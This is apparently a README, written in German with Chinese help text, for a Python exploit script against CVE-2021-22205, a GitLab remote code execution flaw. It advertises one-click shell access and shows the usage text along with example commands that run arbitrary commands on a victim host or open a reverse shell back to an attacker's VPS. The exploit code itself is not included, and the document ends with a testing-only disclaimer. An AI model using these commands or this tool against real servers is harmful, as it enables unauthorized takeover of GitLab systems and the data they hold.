
Python-Exploit-Skript für CVE-2021-22205 (GitLab RCE) mit Befehlsausführung und Reverse-Shell-Funktionen. Unterstützt Ein-Klick-Getshell für Penetrationstests.
Aufgrund einer fehlerhaften Überprüfung der Bilddateien, die an den Dateiparser von GitLab übergeben werden, kann ein Befehl ausgeführt werden. Ein Angreifer kann eine bösartige Anfrage konstruieren, um beliebige Befehle auf dem Zielsystem auszuführen, was letztendlich zur Kontrolle des GitLab-Servers führt. Da es im Internet meist an Reverse-Shell-Funktionen mangelt, wurde das Skript aus dem Internet modifiziert und um eine One-Click-Getshell-Funktion erweitert.
______ _______ ____ ___ ____ _ ____ ____ ____ ___ ____
/ ___\ \ / / ____| |___ \ / _ \___ \/ | |___ \|___ \|___ \ / _ \| ___|
| | \ \ / /| _| _____ __) | | | |__) | |_____ __) | __) | __) | | | |___ \
| |___ \ V / | |__|_____/ __/| |_| / __/| |_____/ __/ / __/ / __/| |_| |___) |
\____ | \_/ |_____| |_____|\___/_____|_| |_____|_____|_____|\___/|____/
usage: CVE-2021-22205.py [-h] [-t TARGET] [-c COMMAND] [--shell] [-i IP]
[-p PORT]
GitLab < 13.10.3 RCE
optional arguments:
-h, --help show this help message and exit
-t TARGET, --target TARGET
目标URL
-c COMMAND, --command COMMAND
执行命令
--shell 是否反弹shell
-i IP, --ip IP 反弹shell ip
-p PORT, --port PORT 反弹shell端口
python3 CVE-2021-22205.py -t [受害者ip] --shell -i [vps ip] -p [vps port] //反弹shell
python3 CVE-2021-22205.py -t [受害者ip] -c [command] //执行命令
Dieses Skript ist nur für Testzwecke bestimmt und darf nicht für andere Zwecke verwendet werden.